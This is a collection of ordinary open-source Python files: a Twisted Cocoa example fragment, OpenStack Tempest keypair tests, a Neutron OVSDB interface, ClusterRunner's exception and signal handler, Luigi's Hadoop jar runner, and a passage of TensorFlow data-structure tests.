self.messageTextField.setStringValue_("http://www.twistedmatrix.com/")
reactor.interleave(AppHelper.callAfter)
def applicationShouldTerminate_(self, sender):
if reactor.running:
reactor.addSystemEventTrigger(
'after', 'shutdown', AppHelper.stopEventLoop)
reactor.stop()
return False
return True
if __name__ == '__main__':
log.startLogging(sys.stdout)
AppHelper.runEventLoop()
| sorenh/cc | vendor/Twisted-10.0.0/doc/core/examples/threadedselect/Cocoa/SimpleWebClient/Twistzilla.py | Python | apache-2.0 | 2,737 |
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.compute import base
from tempest.common.utils import data_utils
from tempest import test
class KeyPairsV3Test(base.BaseComputeTest):
_api_version = 3
@classmethod
def setUpClass(cls):
super(KeyPairsV3Test, cls).setUpClass()
cls.client = cls.keypairs_client
def _delete_keypair(self, keypair_name):
resp, _ = self.client.delete_keypair(keypair_name)
def _create_keypair(self, keypair_name, pub_key=None):
resp, body = self.client.create_keypair(keypair_name, pub_key)
self.addCleanup(self._delete_keypair, keypair_name)
return resp, body
@test.attr(type='gate')
def test_keypairs_create_list_delete(self):
# Keypairs created should be available in the response list
# Create 3 keypairs
key_list = list()
for i in range(3):
k_name = data_utils.rand_name('keypair-')
resp, keypair = self._create_keypair(k_name)
# Need to pop these keys so that our compare doesn't fail later,
# as the keypair dicts from list API doesn't have them.
keypair.pop('private_key')
keypair.pop('user_id')
key_list.append(keypair)
# Fetch all keypairs and verify the list
# has all created keypairs
resp, fetched_list = self.client.list_keypairs()
self.assertEqual(200, resp.status)
# We need to remove the extra 'keypair' element in the
# returned dict. See comment in keypairs_client.list_keypairs()
new_list = list()
for keypair in fetched_list:
new_list.append(keypair['keypair'])
fetched_list = new_list
# Now check if all the created keypairs are in the fetched list
missing_kps = [kp for kp in key_list if kp not in fetched_list]
self.assertFalse(missing_kps,
"Failed to find keypairs %s in fetched list"
% ', '.join(m_key['name'] for m_key in missing_kps))
@test.attr(type='gate')
def test_keypair_create_delete(self):
# Keypair should be created, verified and deleted
k_name = data_utils.rand_name('keypair-')
resp, keypair = self._create_keypair(k_name)
private_key = keypair['private_key']
key_name = keypair['name']
self.assertEqual(key_name, k_name,
"The created keypair name is not equal "
"to the requested name")
self.assertTrue(private_key is not None,
"Field private_key is empty or not found.")
@test.attr(type='gate')
def test_get_keypair_detail(self):
# Keypair should be created, Got details by name and deleted
k_name = data_utils.rand_name('keypair-')
resp, keypair = self._create_keypair(k_name)
resp, keypair_detail = self.client.get_keypair(k_name)
self.assertEqual(200, resp.status)
self.assertIn('name', keypair_detail)
self.assertIn('public_key', keypair_detail)
self.assertEqual(keypair_detail['name'], k_name,
"The created keypair name is not equal "
"to requested name")
public_key = keypair_detail['public_key']
self.assertTrue(public_key is not None,
"Field public_key is empty or not found.")
@test.attr(type='gate')
def test_keypair_create_with_pub_key(self):
# Keypair should be created with a given public key
k_name = data_utils.rand_name('keypair-')
pub_key = ("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCs"
"Ne3/1ILNCqFyfYWDeTKLD6jEXC2OQHLmietMWW+/vd"
"aZq7KZEwO0jhglaFjU1mpqq4Gz5RX156sCTNM9vRbw"
"KAxfsdF9laBYVsex3m3Wmui3uYrKyumsoJn2g9GNnG1P"
"I1mrVjZ61i0GY3khna+wzlTpCCmy5HNlrmbj3XLqBUpip"
"TOXmsnr4sChzC53KCd8LXuwc1i/CZPvF+3XipvAgFSE53pCt"
"LOeB1kYMOBaiUPLQTWXR3JpckqFIQwhIH0zoHlJvZE8hh90"
"XcPojYN56tI0OlrGqojbediJYD0rUsJu4weZpbn8vilb3JuDY+jws"
"snSA8wzBx3A/8y9Pp1B nova@ubuntu")
resp, keypair = self._create_keypair(k_name, pub_key)
self.assertFalse('private_key' in keypair,
"Field private_key is not empty!")
key_name = keypair['name']
self.assertEqual(key_name, k_name,
"The created keypair name is not equal "
"to the requested name!")
class KeyPairsV2TestJSON(KeyPairsV3Test):
_api_version = 2
class KeyPairsV2TestXML(KeyPairsV2TestJSON):
_interface = 'xml'
| Mirantis/tempest | tempest/api/compute/keypairs/test_keypairs.py | Python | apache-2.0 | 5,296 |
# Copyright (c) 2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from six.moves import queue as Queue
import time
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from ovs.db import idl
from neutron.agent.ovsdb import api
from neutron.agent.ovsdb.native import commands as cmd
from neutron.agent.ovsdb.native import connection
from neutron.agent.ovsdb.native import idlutils
from neutron.i18n import _LE
OPTS = [
cfg.StrOpt('ovsdb_connection',
default='tcp:127.0.0.1:6640',
help=_('The connection string for the native OVSDB backend')),
]
cfg.CONF.register_opts(OPTS, 'OVS')
# TODO(twilson) DEFAULT.ovs_vsctl_timeout should be OVS.vsctl_timeout
cfg.CONF.import_opt('ovs_vsctl_timeout', 'neutron.agent.common.ovs_lib')
LOG = logging.getLogger(__name__)
class Transaction(api.Transaction):
def __init__(self, api, ovsdb_connection, timeout,
check_error=False, log_errors=False):
self.api = api
self.check_error = check_error
self.log_errors = log_errors
self.commands = []
self.results = Queue.Queue(1)
self.ovsdb_connection = ovsdb_connection
self.timeout = timeout
def add(self, command):
"""Add a command to the transaction
returns The command passed as a convenience
"""
self.commands.append(command)
return command
def commit(self):
self.ovsdb_connection.queue_txn(self)
result = self.results.get()
if self.check_error:
if isinstance(result, idlutils.ExceptionResult):
if self.log_errors:
LOG.error(result.tb)
raise result.ex
return result
def do_commit(self):
start_time = time.time()
attempts = 0
while True:
elapsed_time = time.time() - start_time
if attempts > 0 and elapsed_time > self.timeout:
raise RuntimeError("OVS transaction timed out")
attempts += 1
# TODO(twilson) Make sure we don't loop longer than vsctl_timeout
txn = idl.Transaction(self.api.idl)
for i, command in enumerate(self.commands):
LOG.debug("Running txn command(idx=%(idx)s): %(cmd)s",
{'idx': i, 'cmd': command})
try:
command.run_idl(txn)
except Exception:
with excutils.save_and_reraise_exception() as ctx:
txn.abort()
if not self.check_error:
ctx.reraise = False
seqno = self.api.idl.change_seqno
status = txn.commit_block()
if status == txn.TRY_AGAIN:
LOG.debug("OVSDB transaction returned TRY_AGAIN, retrying")
if self.api.idl._session.rpc.status != 0:
LOG.debug("Lost connection to OVSDB, reconnecting!")
self.api.idl.force_reconnect()
idlutils.wait_for_change(
self.api.idl, self.timeout - elapsed_time,
seqno)
continue
elif status == txn.ERROR:
msg = _LE("OVSDB Error: %s") % txn.get_error()
if self.log_errors:
LOG.error(msg)
if self.check_error:
# For now, raise similar error to vsctl/utils.execute()
raise RuntimeError(msg)
return
elif status == txn.ABORTED:
LOG.debug("Transaction aborted")
return
elif status == txn.UNCHANGED:
LOG.debug("Transaction caused no change")
return [cmd.result for cmd in self.commands]
class OvsdbIdl(api.API):
ovsdb_connection = connection.Connection(cfg.CONF.OVS.ovsdb_connection,
cfg.CONF.ovs_vsctl_timeout,
'Open_vSwitch')
def __init__(self, context):
super(OvsdbIdl, self).__init__(context)
OvsdbIdl.ovsdb_connection.start()
self.idl = OvsdbIdl.ovsdb_connection.idl
@property
def _tables(self):
return self.idl.tables
@property
def _ovs(self):
return self._tables['Open_vSwitch'].rows.values()[0]
def transaction(self, check_error=False, log_errors=True, **kwargs):
return Transaction(self, OvsdbIdl.ovsdb_connection,
self.context.vsctl_timeout,
check_error, log_errors)
def add_br(self, name, may_exist=True):
return cmd.AddBridgeCommand(self, name, may_exist)
def del_br(self, name, if_exists=True):
return cmd.DelBridgeCommand(self, name, if_exists)
def br_exists(self, name):
return cmd.BridgeExistsCommand(self, name)
def port_to_br(self, name):
return cmd.PortToBridgeCommand(self, name)
def iface_to_br(self, name):
# For our purposes, ports and interfaces always have the same name
return cmd.PortToBridgeCommand(self, name)
def list_br(self):
return cmd.ListBridgesCommand(self)
def br_get_external_id(self, name, field):
return cmd.BrGetExternalIdCommand(self, name, field)
def br_set_external_id(self, name, field, value):
return cmd.BrSetExternalIdCommand(self, name, field, value)
def db_set(self, table, record, *col_values):
return cmd.DbSetCommand(self, table, record, *col_values)
def db_clear(self, table, record, column):
return cmd.DbClearCommand(self, table, record, column)
def db_get(self, table, record, column):
return cmd.DbGetCommand(self, table, record, column)
def db_list(self, table, records=None, columns=None, if_exists=False):
return cmd.DbListCommand(self, table, records, columns, if_exists)
def db_find(self, table, *conditions, **kwargs):
return cmd.DbFindCommand(self, table, *conditions, **kwargs)
def set_controller(self, bridge, controllers):
return cmd.SetControllerCommand(self, bridge, controllers)
def del_controller(self, bridge):
return cmd.DelControllerCommand(self, bridge)
def get_controller(self, bridge):
return cmd.GetControllerCommand(self, bridge)
def set_fail_mode(self, bridge, mode):
return cmd.SetFailModeCommand(self, bridge, mode)
def add_port(self, bridge, port, may_exist=True):
return cmd.AddPortCommand(self, bridge, port, may_exist)
def del_port(self, port, bridge=None, if_exists=True):
return cmd.DelPortCommand(self, port, bridge, if_exists)
def list_ports(self, bridge):
return cmd.ListPortsCommand(self, bridge)
| infobloxopen/neutron | neutron/agent/ovsdb/impl_idl.py | Python | apache-2.0 | 7,372 |
from queue import LifoQueue, Queue
import signal
from threading import current_thread, Lock, main_thread
from app.util import app_info, log, process_utils
from app.util.singleton import Singleton
class UnhandledExceptionHandler(Singleton):
"""
This class implements functionality to catch and log exceptions in a block of code, and also execute a set of
teardown handlers intended to shut down the application gracefully and do any desired cleanup. It is implemented
as a singleton because the teardown handlers can have global effects (e.g., stopping the event loop).
This class is intended to be used as a context manager:
>>> unhandled_exception_handler = UnhandledExceptionHandler.singleton()
>>> with unhandled_exception_handler:
>>> # code which may throw an exception goes here!
"""
HANDLED_EXCEPTION_EXIT_CODE = 1
EXCEPTION_DURING_TEARDOWN_EXIT_CODE = 2
_SIGINFO_DEBUG_LOG = '/tmp/clusterrunner.debug.log'
_signal_names = {
process_utils.SIGINFO: 'SIGINFO',
signal.SIGINT: 'SIGINT',
signal.SIGTERM: 'SIGTERM',
}
def __init__(self):
super().__init__()
self._handling_lock = Lock()
self._teardown_callback_stack = LifoQueue() # we execute callbacks in the reverse order that they were added
self._logger = log.get_logger(__name__)
self._handled_exceptions = Queue()
self._teardown_callback_raised_exception = False
# Set up handlers to be called when the application process receives certain signals.
# Note: this will raise if called on a non-main thread, but we should NOT work around that here. (That could
# prevent the teardown handler from ever being registered!) Calling code should be organized so that this
# singleton is only ever initialized on the main thread.
signal.signal(signal.SIGTERM, self._application_teardown_signal_handler)
signal.signal(signal.SIGINT, self._application_teardown_signal_handler)
try:
signal.signal(process_utils.SIGINFO, self._application_info_dump_signal_handler)
except ValueError:
self._logger.warning('Failed to register signal handler for SIGINFO. This is expected if ClusterRunner '
'is running on Windows.')
@classmethod
def reset_signal_handlers(cls):
"""
Reset all signal handlers to their default values. This is useful in forked subprocesses since we often do not
want to inherit all the signal handlers.
"""
signals_to_reset = dict(cls._signal_names)
signals_to_reset.pop(process_utils.SIGINFO, None) # Leave the SIGINFO handler for forked subprocesses
for signal_num in signals_to_reset:
signal.signal(signal_num, signal.SIG_DFL) # SIG_DFL restores the default behavior for each signal
def add_teardown_callback(self, callback, *callback_args, **callback_kwargs):
"""
Add a callback to be executed in the event of application teardown.
:param callback: The method callback to execute
:type callback: callable
:param callback_args: args to be passed to the callback function
:type callback_args: list
:param callback_kwargs: kwargs to be passed to the callback function
:type callback_kwargs: dict
"""
self._teardown_callback_stack.put((callback, callback_args, callback_kwargs))
def _application_teardown_signal_handler(self, sig, frame):
"""
A signal handler that will trigger application teardown.
:param sig: Signal number of the received signal
:type sig: int
:param frame: The interrupted stack frame
:type frame: frame
"""
self._logger.info('{} signal received. Triggering teardown.', self._signal_names[sig])
raise AppTeardown
def _application_info_dump_signal_handler(self, sig, frame):
"""
A signal handler that will dump application info to the logs.
:param sig: Signal number of the received signal
:type sig: int
:param frame: The interrupted stack frame
:type frame: frame
"""
self._logger.info('{} signal received. Dumping application info.', self._signal_names[sig])
app_info_string = app_info.get_app_info_string()
self._logger.notice(app_info_string)
with open(self._SIGINFO_DEBUG_LOG, 'a') as f:
f.write("{}\n".format(app_info_string))
def __enter__(self):
"""
Enables this to be used as a context manager. No special handling is needed on enter.
"""
pass
def __exit__(self, exc_type, exc_value, traceback):
"""
Enables this to be used as a context manager. If an exception was raised during the execution block (inside the
"with" statement) then exc_value will be set to the exception object.
There are four situations in which we can go through this method:
1. Exception, on main thread
- The exception is logged and in some cases (e.g., SystemExit) may be immediately reraised.
- Teardown callbacks are executed.
- Example: A KeyboardInterrupt exception raised because user presses ctrl-c / sends SIGINT signal
2. Exception, not on main thread
- The exception is logged and in some cases may be passed to the main thread to be reraised.
- Teardown callbacks are executed.
- Example: Any unhandled exception that is raised on a SafeThread
3. Normal exit, on main thread
- We check to see if there was an exception that we need to reraise on the main thread. In almost all cases
we will *not* reraise an exception on the main thread since it has already been logged and teardown
callbacks have already been executed on the thread that raised the exception.
- Teardown callbacks are *not* executed.
- Example: A SystemExit exception raised by sys.exit() is passed from a SafeThread to the main thread to
make Python set the exit code.
4. Normal exit, not on main thread
- Do nothing! All is well.
"""
if exc_value:
# An exception occurred during execution, so run the teardown callbacks. We use a lock here since multiple
# threads could raise exceptions at the same time and we only want to execute these once.
with self._handling_lock:
if not isinstance(exc_value, (SystemExit, AppTeardown, KeyboardInterrupt)):
# It is not very useful to log the SystemExit exception since it is raised by sys.exit(), and thus
# application exit is completely expected.
self._logger.exception('Unhandled exception handler caught exception.')
while not self._teardown_callback_stack.empty():
callback, args, kwargs = self._teardown_callback_stack.get()
self._logger.debug('Executing teardown callback: {}', callback)
try:
callback(*args, **kwargs)
except: # pylint: disable=bare-except
# Also catch any exception that occurs during a teardown callback and log it.
self._teardown_callback_raised_exception = True
self._logger.exception('Exception raised by teardown callback {}', callback)
self._handled_exceptions.put(exc_value)
if current_thread() is main_thread():
# The usage of this class on the main thread is a special case since only exceptions raised on the main
# thread may affect the exit code of the overall application. Any unhandled exceptions raised on child
# threads will only interrupt execution on that particular thread.
#
# This main-thread-only code path serves to ensure that exceptions raised on child threads during a `with
# unhandled_exception_handler` block will also raise an exception on the main thread upon exit of the main
# thread's `with unhandled_exception_handler` block. This ensures we will set a failing exit code even if
# an exception is raised on a child thread.
#
# Note: this only works for child threads protected by the UnhandledExceptionHandler (e.g., an instance of
# a SafeThread).
#
# We check the self._handled_exceptions queue to see if there was an exception that we want to reraise. We
# only care about the first exception on the queue -- it was the first caught exception so it "wins".
if not self._handled_exceptions.empty():
handled_exception = self._handled_exceptions.get()
# We reraise SystemExit on the main thread -- this specific exception is how Python controls setting
# the process exit code, and that only works if raised on the main thread.
if isinstance(handled_exception, SystemExit):
raise handled_exception
# We also want to make sure the process exit code is set non-zero if the UnhandledExceptionHandler
# handled any Exception at all. (Note: this does not include AppTeardown or KeyboardInterrupt, which
# both inherit from BaseException.)
if isinstance(handled_exception, Exception):
raise SystemExit(self.HANDLED_EXCEPTION_EXIT_CODE)
# If an exception was raised while executing one of the teardown callbacks, also make sure to exit with a
# non-zero exit code.
if self._teardown_callback_raised_exception:
raise SystemExit(self.EXCEPTION_DURING_TEARDOWN_EXIT_CODE)
# Returning True from this method tells Python not to re-raise the exc_value exception on the current thread.
return True
class AppTeardown(BaseException):
"""
Trigger application teardown. This works similarly to raising SystemExit, but unlike SystemExit this will not be
reraised on the main thread. Essentially, this would allow execution of main() in main.py to continue past the
`with unhandled_exception_handler` block.
"""
| nickzuber/ClusterRunner | app/util/unhandled_exception_handler.py | Python | apache-2.0 | 10,423 |
import logging
import os
import random
import luigi.hadoop
import luigi.hdfs
logger = logging.getLogger('luigi-interface')
def fix_paths(job):
"""Coerce input arguments to use temporary files when used for output.
Return a list of temporary file pairs (tmpfile, destination path) and
a list of arguments. Converts each HdfsTarget to a string for the
path."""
tmp_files = []
args = []
for x in job.args():
if isinstance(x, luigi.hdfs.HdfsTarget): # input/output
if x.exists() or not job.atomic_output(): # input
args.append(x.path)
else: # output
x_path_no_slash = x.path[:-1] if x.path[-1] == '/' else x.path
y = luigi.hdfs.HdfsTarget(x_path_no_slash + '-luigi-tmp-%09d' % random.randrange(0, 1e10))
tmp_files.append((y, x_path_no_slash))
logger.info("Using temp path: {0} for path {1}".format(y.path, x.path))
args.append(y.path)
else:
args.append(str(x))
return (tmp_files, args)
class HadoopJarJobRunner(luigi.hadoop.JobRunner):
"""JobRunner for `hadoop jar` commands. Used to run a HadoopJarJobTask"""
def __init__(self):
pass
def run_job(self, job):
# TODO(jcrobak): libjars, files, etc. Can refactor out of
# hadoop.HadoopJobRunner
if not job.jar() or not os.path.exists(job.jar()):
logger.error("Can't find jar: {0}, full path {1}".format(job.jar(),
os.path.abspath(job.jar())))
raise Exception("job jar does not exist")
arglist = [luigi.hdfs.load_hadoop_cmd(), 'jar', job.jar()]
if job.main():
arglist.append(job.main())
jobconfs = job.jobconfs()
for jc in jobconfs:
arglist += ['-D' + jc]
(tmp_files, job_args) = fix_paths(job)
arglist += job_args
luigi.hadoop.run_and_track_hadoop_job(arglist)
for a, b in tmp_files:
a.move(b)
class HadoopJarJobTask(luigi.hadoop.BaseHadoopJobTask):
"""A job task for `hadoop jar` commands that define a jar and (optional)
main method"""
def jar(self):
"""Path to the jar for this Hadoop Job"""
return None
def main(self):
"""optional main method for this Hadoop Job"""
return None
def job_runner(self):
# We recommend that you define a subclass, override this method and set up your own config
return HadoopJarJobRunner()
def atomic_output(self):
"""If True, then rewrite output arguments to be temp locations and
atomically move them into place after the job finishes"""
return True
def args(self):
"""returns an array of args to pass to the job (after hadoop jar <jar> <main>)."""
return []
| mortardata/luigi | luigi/hadoop_jar.py | Python | apache-2.0 | 2,852 |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import json
import os
import pickle
from absl.testing import parameterized
import numpy
import six
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.keras.engine import sequential
from tensorflow.python.keras.engine import training
from tensorflow.python.keras.layers import core
from tensorflow.python.keras.layers import normalization
from tensorflow.python.layers import core as non_keras_core
from tensorflow.python.module import module
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.training.tracking import data_structures
from tensorflow.python.training.tracking import tracking
from tensorflow.python.training.tracking import util
from tensorflow.python.util import nest
from tensorflow.python.util import serialization
class HasList(training.Model):
def __init__(self):
super(HasList, self).__init__()
self.layer_list = data_structures.List([core.Dense(3)])
self.layer_list.append(core.Dense(4))
self.layer_list.extend(
[core.Dense(5),
core.Dense(6, kernel_regularizer=math_ops.reduce_sum)])
self.layer_list += [
core.Dense(7, bias_regularizer=math_ops.reduce_sum),
core.Dense(8)
]
self.layer_list += (
data_structures.List([core.Dense(9)]) + data_structures.List(
[core.Dense(10)]))
self.layer_list.extend(
data_structures.List(
list([core.Dense(11)]) + [core.Dense(12)]))
self.layers_with_updates = data_structures.List(
(normalization.BatchNormalization(),))
def call(self, x):
aggregation = 0.
for l in self.layer_list:
x = l(x)
aggregation += math_ops.reduce_sum(x)
bn, = self.layers_with_updates
return bn(x) / aggregation
class ListTests(test.TestCase):
@test_util.run_in_graph_and_eager_modes
@test_util.run_v1_only("b/120545219")
def testTracking(self):
model = HasList()
output = model(array_ops.ones([32, 2]))
self.assertAllEqual([32, 12], output.shape)
self.assertEqual(11, len(model.layers))
self.assertEqual(10, len(model.layer_list.layers))
six.assertCountEqual(
self,
model.layers,
model.layer_list.layers + model.layers_with_updates)
for index in range(10):
self.assertEqual(3 + index, model.layer_list.layers[index].units)
self.assertEqual(2, len(model._checkpoint_dependencies))
self.assertIs(model.layer_list, model._checkpoint_dependencies[0].ref)
self.assertIs(model.layers_with_updates,
model._checkpoint_dependencies[1].ref)
self.assertEqual(
10, len(model._checkpoint_dependencies[0].ref._checkpoint_dependencies))
self.evaluate([v.initializer for v in model.variables])
self.evaluate(model.variables[0].assign([[1., 2., 3.], [4., 5., 6.]]))
save_path = os.path.join(self.get_temp_dir(), "ckpt")
model.save_weights(save_path)
self.evaluate(model.variables[0].assign(array_ops.zeros([2, 3])))
model.load_weights(save_path)
self.assertAllEqual([[1., 2., 3.], [4., 5., 6.]],
self.evaluate(model.variables[0]))
v = variables.Variable(1.)
model.var_list = [v]
self.assertIn(v, model.variables)
self.assertIn(v, model.trainable_variables)
self.assertNotIn(v, model.non_trainable_variables)
self.assertIn(model.layer_list[0].trainable_weights[0],
model.trainable_weights)
def testSubModelTracking(self):
model = training.Model()
model.v = variables.Variable(1.)
self.assertIn(model.v, model.trainable_weights)
model2 = training.Model()
model2.m = [model]
self.assertIn(model.v, model2.trainable_weights)
def testSubSequentialTracking(self):
class _Subclassed(training.Model):
def __init__(self, wrapped):
super(_Subclassed, self).__init__()
self._wrapped = wrapped
def call(self, x):
return self._wrapped(x)
model = sequential.Sequential()
layer = core.Dense(1)
model.add(layer)
model2 = _Subclassed(model)
model2(array_ops.ones([1, 2]))
model2.m = [model]
self.assertIn(layer.kernel, model2.trainable_weights)
def testLayerTrackedThroughSequential(self):
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
def ffnet(layer_sizes, name):
ff = sequential.Sequential(name=name)
for i, width in enumerate(layer_sizes):
ff.add(core.Dense(
width,
activation=("relu" if i < len(layer_sizes)-1 else None)))
return ff
class MyModel2(training.Model):
def __init__(self, config, name="my_model_2"):
super(MyModel2, self).__init__(name=name)
self._num_tokens = config.num_tokens
# list of sub-models
self._ffnet = [ffnet(config.module_layers + (self._num_tokens,), "ff")]
def null_input(self):
return array_ops.zeros([1, self._num_tokens], dtype=dtypes.float32)
def call(self, input_, module_index=None):
return self._ffnet[0](input_)
m2 = MyModel2(AttrDict(
num_tokens=5,
module_layers=(50, 30)))
# Construct
m2(m2.null_input())
self.assertLen(m2.trainable_variables, 6)
def testJSONSerialization(self):
obj = tracking.AutoTrackable()
obj.l = [1]
json.dumps(obj.l, default=serialization.get_json_type)
@test_util.run_v1_only("b/120545219")
def testUpdatesForwarded(self):
with context.graph_mode():
model = HasList()
model_input = array_ops.ones([32, 2])
model(model_input)
self.assertGreater(len(model.layers_with_updates[0].updates), 0)
self.assertEqual(set(model.layers_with_updates[0].updates),
set(model.updates))
with context.eager_mode():
model = HasList()
model_input = array_ops.ones([32, 2])
model(model_input)
self.assertEqual(0, len(model.updates))
@test_util.run_in_graph_and_eager_modes
@test_util.run_v1_only("b/120545219")
def testLossesForwarded(self):
model = HasList()
model_input = array_ops.ones([32, 2])
model(model_input)
self.assertEqual(2, len(model.losses))
def testModelContainersCompareEqual(self):
class HasEqualContainers(training.Model):
def __init__(self):
super(HasEqualContainers, self).__init__()
self.l1 = []
self.l2 = []
model = HasEqualContainers()
first_layer = HasEqualContainers()
model.l1.append(first_layer)
second_layer = HasEqualContainers()
model.l2.append(second_layer)
self.assertEqual([first_layer, second_layer], model.layers)
def testNotTrackable(self):
class NotTrackable(object):
pass
with self.assertRaises(ValueError):
data_structures.List([NotTrackable()])
def testCallNotImplemented(self):
with self.assertRaisesRegexp(TypeError, "not callable"):
data_structures.List()(1.)
def testNoPop(self):
with self.assertRaises(AttributeError):
data_structures.List().pop()
@test_util.run_in_graph_and_eager_modes
def testTensorConversion(self):
class ListToTensor(training.Model):
def __init__(self):
super(ListToTensor, self).__init__()
self.l = [1., 2., 3.]
self.assertAllEqual(
[1., 2., 3.],
self.evaluate(constant_op.constant(ListToTensor().l)))
self.assertAllEqual(
[1., 2., 3.],
self.evaluate(array_ops.pack(ListToTensor().l)))
def testNesting(self):
with context.graph_mode():
inner = data_structures.List()
outer = data_structures.List([inner])
inner.append(non_keras_core.Dense(1))
inner[0](array_ops.ones([2, 3]))
self.assertEqual(2, len(outer.variables))
self.assertIsInstance(
outer.variables[0],
resource_variable_ops.ResourceVariable)
def testNonLayerVariables(self):
v = resource_variable_ops.ResourceVariable([1.])
l = data_structures.List([v])
self.assertTrue(l.trainable)
self.assertEqual([], l.layers)
self.assertEqual([v], l.variables)
self.assertEqual([v], l.trainable_weights)
self.assertEqual([], l.non_trainable_variables)
l.trainable = False
self.assertEqual([v], l.variables)
self.assertEqual([], l.trainable_variables)
self.assertEqual([v], l.non_trainable_variables)
l.trainable = True
v2 = resource_variable_ops.ResourceVariable(1., trainable=False)
l.append(v2)
self.assertEqual([v, v2], l.weights)
self.assertEqual([v], l.trainable_weights)
self.assertEqual([v2], l.non_trainable_weights)
def testCopy(self):
v1 = resource_variable_ops.ResourceVariable(1.)
v2 = resource_variable_ops.ResourceVariable(1.)
v3 = resource_variable_ops.ResourceVariable(1.)
l1 = data_structures.List([v1, v2])
l2 = l1.copy()
l2.append(v3)
self.assertEqual(list(l1), [v1, v2])
self.assertEqual(list(l2), [v1, v2, v3])
def testSlicing(self):
v1 = resource_variable_ops.ResourceVariable(1.)
v2 = resource_variable_ops.ResourceVariable(1.)
v3 = resource_variable_ops.ResourceVariable(1.)
v4 = resource_variable_ops.ResourceVariable(1.)
l = data_structures.List([v1, v2, v3, v4])
self.assertEqual(l[1:], [v2, v3, v4])
self.assertEqual(l[1:-1], [v2, v3])
self.assertEqual(l[:-1], [v1, v2, v3])
def testHash(self):
has_sequences = set([data_structures.List(),
data_structures.List()])
self.assertEqual(2, len(has_sequences))
self.assertNotIn(data_structures.List(), has_sequences)
def testIMul_zero(self):
l = data_structures.List([])
with self.assertRaisesRegexp(ValueError, "List only supports append"):
l *= 0
def testIMul(self):
v = resource_variable_ops.ResourceVariable(1.)
l = data_structures.List([v])
l *= 2
self.assertEqual(list(l), [v] * 2)
def testMul(self):
v = resource_variable_ops.ResourceVariable(1.)
l = data_structures.List([v, v, v])
self.assertEqual(list(l * 2), [v, v, v] * 2)
def testRMul(self):
v = resource_variable_ops.ResourceVariable(1.)
l = data_structures.List([v, v, v])
self.assertEqual(list(2 * l), [v, v, v] * 2)
class ListWrapperTest(test.TestCase):
IGNORED = ("__new__", "__init__", "__subclasshook__", "__getattribute__")
def test_overrides_all_list_methods(self):
not_overridden = []
for name in dir(list):
if name in ListWrapperTest.IGNORED:
continue
list_method = getattr(list, name)
if not callable(list_method):
continue
object_method = getattr(object, name, None)
if object_method is not None and object_method == list_method:
# Skip methods that aren't overridden from object.
continue
if list_method == getattr(data_structures.ListWrapper, name):
not_overridden.append(name)
if not_overridden:
self.fail("ListWrapper does not override %s" % (not_overridden))
def testPickle(self):
original = data_structures.ListWrapper([1, 2])
serialized = pickle.dumps(original)
del original
deserialized = pickle.loads(serialized)
self.assertEqual([1, 2], deserialized)
def testSameStructure(self):
l = [1]
nest.assert_same_structure(l, data_structures.ListWrapper(copy.copy(l)))
def testFunctionCaching(self):
@def_function.function
def f(list_input):
return list_input[0] + constant_op.constant(1.)
first_trace = f.get_concrete_function([constant_op.constant(2.)])
second_trace = f.get_concrete_function(
data_structures.ListWrapper([constant_op.constant(3.)]))
self.assertIs(first_trace, second_trace)
def testListWrapperBasic(self):
# ListWrapper, unlike List, compares like the built-in list type (since it
# is used to automatically replace lists).
a = tracking.AutoTrackable()
b = tracking.AutoTrackable()
self.assertEqual([a, a],
[a, a])
self.assertEqual(data_structures.ListWrapper([a, a]),
data_structures.ListWrapper([a, a]))
self.assertEqual([a, a],
data_structures.ListWrapper([a, a]))
self.assertEqual(data_structures.ListWrapper([a, a]),
[a, a])
self.assertNotEqual([a, a],
[b, a])
self.assertNotEqual(data_structures.ListWrapper([a, a]),
data_structures.ListWrapper([b, a]))
self.assertNotEqual([a, a],
data_structures.ListWrapper([b, a]))
self.assertLess([a], [a, b])
self.assertLess(data_structures.ListWrapper([a]),
data_structures.ListWrapper([a, b]))
self.assertLessEqual([a], [a, b])
self.assertLessEqual(data_structures.ListWrapper([a]),
data_structures.ListWrapper([a, b]))
self.assertGreater([a, b], [a])
self.assertGreater(data_structures.ListWrapper([a, b]),
data_structures.ListWrapper([a]))
self.assertGreaterEqual([a, b], [a])
self.assertGreaterEqual(data_structures.ListWrapper([a, b]),
data_structures.ListWrapper([a]))
self.assertEqual([a], data_structures.ListWrapper([a]))
self.assertEqual([a], list(data_structures.List([a])))
self.assertEqual([a, a], data_structures.ListWrapper([a]) + [a])
self.assertEqual([a, a], [a] + data_structures.ListWrapper([a]))
